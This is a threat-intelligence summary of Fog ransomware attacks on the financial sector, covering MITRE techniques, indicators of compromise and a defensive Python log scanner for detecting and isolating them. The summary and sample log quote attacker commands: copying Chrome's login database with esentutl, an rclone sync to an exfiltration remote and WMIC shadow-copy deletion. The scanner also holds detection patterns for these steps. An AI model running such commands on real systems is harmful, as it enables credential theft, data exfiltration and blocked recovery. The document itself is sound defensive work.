Fog Ransomware has shifted its targets to the financial services sector, employing compromised VPN credentials and privilege escalation to encrypt critical files. Adlumin successfully contained the August 2024 attack by isolating affected machines and preventing data theft using decoy files and real-time monitoring.
#FogRansomware #LostInTheFog #STOPDJVU #Adlumin #FinancialServices
Key points
- The Fog Ransomware group is now targeting the financial services sector.
- Adlumin’s technology isolated affected machines during the August 2024 attack, preventing significant encryption or data theft.
- Fog exploits compromised VPN credentials and targets sensitive data on Windows and Linux systems.
- The ransomware uses advanced techniques like pass-the-hash for privilege escalation.
- Indicators of compromise include IP addresses originating in Russia, though attribution remains uncertain.
- Recommendations include MFA, regular updates, endpoint isolation, and a comprehensive security platform.
MITRE Techniques
- [T1003] Credential Dumping – Brief description: Used esentutl.exe to back up login data, including encrypted credentials from Google Chrome. Command observed: cmd.exe /Q /c esentutl.exe /y "C:\Users\USERNAME\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\USERNAME\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"
- [T1021] Lateral Movement – Brief description: Used two compromised service accounts to move laterally; nltest /domain_trusts was executed to leverage domain trust relationships.
- [T1105] Remote File Copy – Brief description: Used Rclone to sync and transfer data from compromised endpoints, targeting files modified within the last two years while excluding certain file types.
- [T1486] Data Encrypted for Impact – Brief description: Deployed locker.exe to encrypt files on the network; files marked with .FOG or .FLOCKED extensions and a ransom note left on endpoints.
- [T1016] Network Discovery – Brief description: Sent pings to other endpoints; outputs stored in pings.txt and pingw.txt; used Advanced_Port_Scanner_2.5.3869(1).exe for reconnaissance.
- [T1047] Windows Management Instrumentation – Brief description: Used WMIC commands to delete system shadow copies to hinder recovery.
Indicators of Compromise
- [IP Address] Russia-origin IPs – Russia-based IP addresses observed during intrusion
- [File] locker.exe – Used to encrypt or “lock” files on the network
- [File] SharpShares.exe – Mapped network drives to enable lateral movement
- [File] readme.txt – Ransom note placed on infected endpoints
- [File] pings.txt, pingw.txt – Outputs of network discovery stored for reconnaissance
- [File] Advanced_Port_Scanner_2.5.3869(1).exe – Network scanning tool used for discovery
- [Tool] Rclone – Used to sync and transfer data from compromised endpoints
- [File Extension] .FOG, .FLOCKED – Extensions assigned to encrypted files
- [File] esentutl.exe – Used to back up login data, including credentials from Chrome
- [Command] nltest /domain_trusts – Used to leverage domain trust relationships
- [Tool] WMIC – Used to delete system shadow copies
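The technique and indicator lists above translate directly into process-creation detection logic. The following is an added example written for this summary, not Adlumin's code or tooling: it scans process-creation log lines for the command-line artefacts the page attributes to each MITRE technique and flags hosts that have reached the impact stage (shadow-copy deletion or locker.exe execution) as candidates for isolation. The log format ("timestamp host=... user=... cmd=..."), the sample lines, the hostnames and usernames, and the regular expressions are all constructed assumptions for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Detection rules keyed by the MITRE technique IDs listed on this page.
# The patterns are assumptions written for this example, derived from the
# command-line artefacts the page attributes to each technique.
RULES = [
    ("T1003", "Credential Dumping",
     re.compile(r"\besentutl(\.exe)?\b.*\s/y\s.*Login Data", re.I)),
    ("T1021", "Lateral Movement",
     re.compile(r"\bnltest(\.exe)?\s+/domain_trusts\b", re.I)),
    ("T1105", "Remote File Copy",
     re.compile(r"\brclone(\.exe)?\b", re.I)),
    ("T1016", "Network Discovery",
     re.compile(r"Advanced_Port_Scanner|\bping[sw]\.txt\b", re.I)),
    ("T1047", "Windows Management Instrumentation",
     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b", re.I)),
    ("T1486", "Data Encrypted for Impact",
     re.compile(r"\blocker\.exe\b", re.I)),
]

# Techniques that mean the intrusion has reached the impact stage; the page's
# recommended response at that point is endpoint isolation.
IMPACT_STAGE = {"T1047", "T1486"}

# Extensions the page reports on encrypted files.
ENCRYPTED_EXTENSIONS = (".fog", ".flocked")

# Assumed log line format: "<timestamp> host=<host> user=<user> cmd=<command line>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$"
)

# Constructed sample telemetry (hostnames, users and timestamps are invented).
SAMPLE_LOG = r"""2024-08-12T03:11:02Z host=FIN-WS07 user=svc_backup cmd=cmd.exe /Q /c esentutl.exe /y "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\jdoe\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp"
2024-08-12T03:14:45Z host=FIN-WS07 user=svc_backup cmd=nltest /domain_trusts
2024-08-12T03:20:10Z host=FIN-WS07 user=svc_backup cmd=Advanced_Port_Scanner_2.5.3869(1).exe
2024-08-12T03:35:51Z host=FIN-FS01 user=svc_sql cmd=rclone.exe sync "\\FIN-FS01\Finance" remote:exfil --max-age 2y --exclude "*.exe"
2024-08-12T03:40:00Z host=FIN-FS01 user=svc_sql cmd=wmic shadowcopy delete
2024-08-12T03:41:13Z host=FIN-FS01 user=svc_sql cmd=locker.exe
2024-08-12T08:00:00Z host=FIN-WS03 user=alice cmd=chrome.exe --profile-directory=Default
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_command(cmd: str) -> List[str]:
    """Return the technique IDs whose pattern matches this command line."""
    return [tid for tid, _name, pattern in RULES if pattern.search(cmd)]


def scan_log(log_text: str) -> List[Dict[str, str]]:
    """Return one hit per (line, technique) pair, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for tid in classify_command(rec["cmd"]):
            hits.append({"technique": tid, "host": rec["host"],
                         "user": rec["user"], "ts": rec["ts"], "cmd": rec["cmd"]})
    return hits


def hosts_to_isolate(log_text: str) -> List[str]:
    """Hosts on which an impact-stage technique was observed, sorted by name."""
    techniques_by_host = defaultdict(set)
    for hit in scan_log(log_text):
        techniques_by_host[hit["host"]].add(hit["technique"])
    return sorted(h for h, tids in techniques_by_host.items() if tids & IMPACT_STAGE)


def is_fog_encrypted(path: str) -> bool:
    """True if a file name carries one of the extensions the page associates with Fog."""
    return path.lower().endswith(ENCRYPTED_EXTENSIONS)


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["host"]} {hit["user"]} {hit["technique"]}: {hit["cmd"][:60]}')
    print("isolate:", hosts_to_isolate(SAMPLE_LOG))
```

On the sample, the workstation shows only the early-stage techniques (credential backup, trust enumeration, scanning), while the file server shows exfiltration followed by shadow-copy deletion and locker.exe, so only the file server is returned for isolation. Real deployments would feed these rules from Sysmon event ID 1 or the EDR's process-creation stream rather than a text log.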
Read more: https://adlumin.com/post/fog-ransomware-now-targeting-the-financial-sector/